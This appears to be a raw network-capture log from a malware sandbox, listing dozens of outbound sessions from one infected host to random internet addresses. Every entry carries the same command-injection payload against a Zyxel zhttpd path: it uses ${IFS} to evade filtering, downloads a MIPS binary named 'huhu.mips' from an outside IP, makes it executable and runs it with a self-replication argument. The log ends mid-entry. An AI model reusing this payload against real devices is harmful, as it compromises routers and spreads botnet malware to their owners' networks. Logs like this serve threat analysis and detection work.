                                                        Feb 2, 2024 06:21:03.808695078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2846192.168.2.1442880149.237.42.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808736086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2847192.168.2.145691247.51.188.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808764935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2848192.168.2.1443198150.212.10.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808794975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2849192.168.2.1457902104.190.176.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808835030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2850192.168.2.1446530182.109.77.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808881998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2851192.168.2.143438625.53.28.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808912992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2852192.168.2.1455712177.123.210.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808958054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2853192.168.2.145771813.173.170.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808986902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2854192.168.2.1443974198.135.251.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809010029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2855192.168.2.143644431.169.133.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809060097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2856192.168.2.146021497.91.211.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809098005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2857192.168.2.144497496.165.39.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809140921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2858192.168.2.1460314204.149.118.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809185982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2859192.168.2.1456840156.240.173.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809247017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2860192.168.2.145073040.0.59.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809288979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2861192.168.2.1442690201.63.216.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809319973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2862192.168.2.1446352133.109.93.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809359074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2863192.168.2.143898074.194.91.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809412956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2864192.168.2.1456564210.139.50.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809438944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2865192.168.2.144508483.175.197.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809484959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2866192.168.2.144632257.78.141.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809533119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2867192.168.2.1456224184.184.75.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809583902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2868192.168.2.1452484160.52.8.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809616089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2869192.168.2.1436476149.103.208.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809675932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2870192.168.2.145703649.191.148.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809714079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2871192.168.2.1433258170.2.170.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809736013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2872192.168.2.1440202133.47.83.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809782028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2873192.168.2.145239298.180.214.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809822083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2874192.168.2.145478473.205.168.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809869051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2875192.168.2.1442998129.232.182.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809909105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2876192.168.2.1443516163.194.156.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809933901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2877192.168.2.1458142176.155.254.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809958935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2878192.168.2.144508264.222.34.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.809999943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2879192.168.2.1447364192.64.27.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810029030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2880192.168.2.1458654221.248.73.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810055971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2881192.168.2.1450436197.44.35.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810100079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2882192.168.2.1446108157.195.198.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810136080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2883192.168.2.1460576205.234.242.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810189962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2884192.168.2.144217067.160.177.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810225010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2885192.168.2.1439358204.32.206.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810275078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2886192.168.2.1436226140.183.207.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810321093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2887192.168.2.143672648.232.243.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810372114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2888192.168.2.1441126164.203.245.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810401917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2889192.168.2.1440068222.38.245.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810453892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2890192.168.2.1444212190.117.86.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810483932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2891192.168.2.1459494141.156.66.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810540915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2892192.168.2.146058238.58.128.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810587883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2893192.168.2.14579145.103.235.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810632944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2894192.168.2.145777293.255.97.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810676098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2895192.168.2.1458354128.21.50.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810693026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2896192.168.2.143293217.68.64.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810733080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2897192.168.2.145357279.115.116.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810782909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2898192.168.2.1460426157.103.202.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810822010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2899192.168.2.143862481.85.37.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810877085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2900192.168.2.1438096128.141.35.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810899019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2901192.168.2.1457824116.172.107.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810935974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2902192.168.2.1447014170.142.115.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.810987949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2903192.168.2.1454870141.31.198.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811018944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2904192.168.2.1440164211.228.242.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811096907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2905192.168.2.1452142183.136.231.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811120033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2906192.168.2.1433742210.80.3.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811167955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2907192.168.2.1448906148.226.168.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811211109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2908192.168.2.1432846153.29.224.88443
                                                        TimestampBytes transferredDirectionData
